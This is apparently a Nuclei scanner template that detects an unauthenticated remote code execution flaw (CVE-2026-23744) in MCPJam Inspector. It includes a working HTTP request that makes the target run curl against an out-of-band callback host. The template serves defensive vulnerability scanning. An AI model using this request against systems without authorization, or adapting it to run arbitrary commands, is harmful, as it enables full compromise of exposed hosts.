id: CVE-2026-23744 info: name: MCPJam Inspector - Remote Code Execution author: Louay-075 severity: critical description: | MCPJam inspector is the local-first development platform for MCP servers. The Latest version 1.4.2 and earlier are vulnerable to a remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. impact: | An unauthenticated attacker can remotely execute arbitrary system commands via the exposed /api/mcp/connect endpoint. Successful exploitation leads to full compromise of the affected host. remediation: | Upgrade MCPJam Inspector to version 1.4.3 or later. Restrict the service to listen on 127.0.0.1. reference: - https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6 - https://github.com/advisories/GHSA-232v-j27c-5pp6 - https://nvd.nist.gov/vuln/detail/CVE-2026-23744 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-23744 epss-score: 0.45026 epss-percentile: 0.98654 cwe-id: CWE-306 metadata: verified: true max-request: 1 vendor: mcpjam product: mcpjam tags: cve,cve2026,rce,mcpjam,oast,ai,vkev http: - raw: - | POST /api/mcp/connect HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"serverConfig":{"timeout":10000,"command":"curl","args":["{{interactsh-url}}"],"env":{}},"serverId":"mymcp"} matchers: - type: dsl dsl: - 'contains_all(body, "Connection failed for server", "MCP error")' - 'contains(content_type, "application/json")' - 'contains(interactsh_protocol, "dns")' - 'status_code == 500' condition: and # digest: 4b0a00483046022100d96fbd15031e2d6a3ec92e5ed42655253cbb9900b5fcc3d8b7abbdaf4171c98c022100c17f97425e7dfcb98601816d30db047911bb4f14c1b8fa2f3dda6cbf1f7fef64:922c64590222798bb761d5b6d8e72950